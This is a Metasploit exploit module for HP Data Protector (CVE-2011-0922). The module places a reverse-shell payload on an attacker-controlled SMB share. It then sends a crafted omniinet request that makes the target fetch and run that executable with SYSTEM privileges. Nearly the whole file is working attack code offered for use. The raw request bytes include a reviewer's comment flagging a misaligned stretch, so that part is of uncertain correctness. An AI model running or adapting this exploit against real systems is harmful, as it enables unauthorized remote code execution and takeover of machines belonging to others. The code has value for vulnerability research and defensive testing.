# Title : HP Data Protector CMD Install Service Vulnerability (msf)
# Published : 2013-08-02
# Author :
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
# Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability
# Date: 2012-13-07
# Exploit Author: Ben Turner, Doug McLeod
# Vendor Homepage: www.hp.com
# Version: 6.10 & 6.11 & 6.20
# Tested on: Windows 2003 Server SP2 en
# CVE: CVE-2011-0922
# Notes: ZDI-11-056
# Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-056/
# Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143
require 'msf/core'
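class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # Exploit mixins should be called first
  include Msf::Exploit::Remote::SMB
  include Msf::Exploit::EXE
  include Msf::Auxiliary::Report

  # Aliases for common classes
  SIMPLE = Rex::Proto::SMB::Client
  XCEPT = Rex::Proto::SMB::Exceptions
  CONST = Rex::Proto::SMB::Constants

  # The omniinet request built in build_install_request hard-codes the UNC path
  # \\<SMBServer>\Omniback\i386\installservice.exe in UTF-16LE, so the share
  # name and the file name are fixed here and cannot be made options without
  # also changing the request bytes.
  SHARE_NAME = 'Omniback'
  PAYLOAD_PATH = "\\i386\\installservice.exe"

  def initialize
    super(
      'Name'           => 'HP Data Protector CMD Install Service Vulnerability',
      'Description'    => %Q{
        This module exploits the HP Data Protector omniinet process on Windows only.
        It invokes the install service function, which makes omniinet fetch and run
        installservice.exe from an SMB share you control; the module first uploads
        a reverse tcp payload to that share (using the SMBUser/SMBPass options of the
        SMB mixin, if set) and then sends the install request to RHOST:RPORT. To
        ensure this works, the SMB server must have a share called Omniback which
        has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\, writable by the
        uploader and reachable from the target on TCP/445.
      },
      'Author'         => [ 'Ben Turner', 'Doug McLeod' ],
      'License'        => BSD_LICENSE,
      # References taken from the module header (CVE-2011-0922 / ZDI-11-056).
      'References'     =>
        [
          [ 'CVE', '2011-0922' ],
          [ 'ZDI', '11-056' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-056/' ],
          [ 'URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143' ]
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'WfsDelay' => 10,
          'EXITFUNC' => 'process'
        },
      'Payload'        => { 'BadChars' => '', 'DisableNops' => true },
      'Platform'       => ['win'],
      'Targets'        =>
        [
          [ 'HP Data Protector 6.10/6.11/6.20 on Windows', {}]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'July 29 2013'
    )

    register_options([
      # No placeholder default: the value is embedded verbatim in the UNC path
      # the target connects to, so an unset option must fail validation rather
      # than send the literal string 'IPAddress'.
      OptString.new('SMBServer', [true, 'The IP address (or hostname) of the SMB server which hosts your Omniback share']),
      Opt::RPORT(5555),
    ], self.class)
  end

  # Drops the payload on the share, checks it is visible, then sends the
  # install-service request to omniinet on RHOST:RPORT and starts the handler.
  # Any SMB or connection failure raises so the framework reports it; the module
  # never calls Kernel#abort, which would exit the whole console process.
  def exploit
    request = build_install_request(datastore['SMBServer'])

    filedrop
    filetest

    begin
      connect
      sock.put(request)
    rescue ::StandardError => e
      # StandardError, not Exception: do not swallow Interrupt/SystemExit.
      print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}: #{e}")
      raise
    end
    print_status("Waiting ...")
    print_good("Sent :) Good Luck")

    # The omniinet socket is deliberately left open while the handler waits
    # (the original module had `disconnect` commented out here); the service
    # may still be fetching installservice.exe from the share.
    handler
  end

  # Uploads the generated payload executable to
  # \\SMBServer\Omniback\i386\installservice.exe over SMB.
  # Raises on connection, login, share or write failure.
  def filedrop
    with_omniback_share do
      print_status("Generating payload, dropping here: #{payload_unc_path}...")
      exe = generate_payload_exe
      fd = smb_open(PAYLOAD_PATH, 'rwct')
      begin
        fd << exe
      ensure
        fd.close
      end
    end
  end

  # Verifies that the uploaded payload is visible on the share. Raises if it is
  # not: omniinet will not be able to fetch it either, so sending the request
  # would be pointless.
  def filetest
    with_omniback_share do
      print_status("Checking the remote share for: #{payload_unc_path}...")
      if smb_file_exist?(PAYLOAD_PATH)
        print_good("Found, upload was succesful! #{payload_unc_path}")
      else
        print_error("#{payload_unc_path} - The file does not exist, try again!")
        raise "payload not found at #{payload_unc_path}"
      end
    end
  end

  private

  # \\<SMBServer>\Omniback
  def share_unc_path
    "\\\\#{datastore['SMBServer']}\\#{SHARE_NAME}"
  end

  # \\<SMBServer>\Omniback\i386\installservice.exe
  def payload_unc_path
    "#{share_unc_path}#{PAYLOAD_PATH}"
  end

  # Temporarily points RHOST/RPORT at the SMB server (the SMB mixin's connect
  # reads them from the datastore), opens a session and the Omniback tree, and
  # yields. RHOST/RPORT are always restored and the SMB socket closed, even on
  # error, so the following omniinet connect goes to the real target and the
  # SMB sockets are not leaked.
  def with_omniback_share
    orig_rhost = datastore['RHOST']
    orig_rport = datastore['RPORT']
    datastore['RHOST'] = datastore['SMBServer']
    datastore['RPORT'] = 445
    begin
      connect
      smb_login
      self.simple.connect(share_unc_path)
      yield
    rescue XCEPT::Error => e
      print_error("Could not connect to the SMB share #{share_unc_path}: #{e}")
      raise
    ensure
      disconnect if sock
      datastore['RHOST'] = orig_rhost
      datastore['RPORT'] = orig_rport
    end
  end

  # Encodes +host+ as it is spliced into the request below: a NUL before every
  # character. Each splice point in the request ends on the low byte of a
  # UTF-16LE unit (\x20 or \x5c), so "\x00h1\x00h2..." completes that unit and
  # continues the text; the byte after the splice supplies the final NUL.
  def utf16le_host(host)
    host.to_s.each_char.map { |c| "\x00#{c}" }.join
  end

  # Builds the omniinet install-service request for +host+ (the SMB server).
  # The bytes are reproduced as published (a 4-byte prefix, then \xff\xfe BOM
  # and UTF-16LE text: "2", the host, "0", "SYSTEM", "NT AUTHORITY", "C", "26",
  # the installservice.exe command line with "-source" pointing at the share,
  # then a second \xff\xfe block with "26 [0]ADD/UPGRADE\n\\host\Omniback\i386").
  # The message is protocol data, not shellcode: nothing in it is executed
  # directly; the target is told which executable to fetch and run.
  def build_install_request(host)
    host16 = utf16le_host(host)

    req = "\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20"
    req << host16
    req << "\x00\x00\x00\x20\x00\x30\x00"
    req << "\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00"
    req << "\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00"
    req << "\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00"
    req << "\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00"
    req << "\x5c"
    req << host16
    req << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00"
    req << "\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
    req << "\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00"
    req << "\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00"
    req << "\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00"
    # NOTE(review): "\x20\x4f" below breaks the \xNN\x00 rhythm (no NUL after
    # the space) and the host copy that follows is not NUL-terminated either,
    # so this stretch is misaligned as UTF-16LE. Kept byte-for-byte as
    # published; confirm against a packet capture before changing it.
    req << "\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62"
    req << "\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c"
    req << host16
    req << "\x5c\x00\x5c\x00\x4f\x00"
    req << "\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00"
    req << "\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00"
    req << "\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00"
    req << "\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00"
    req << "\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00"
    req << "\x5c\x00\x5c"
    req << host16
    req << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
    req << "\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54"
    req << "\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00"
    req << "\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00"
    req << "\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c"
    req << host16
    req << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63"
    req << "\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00"
    req
  end
end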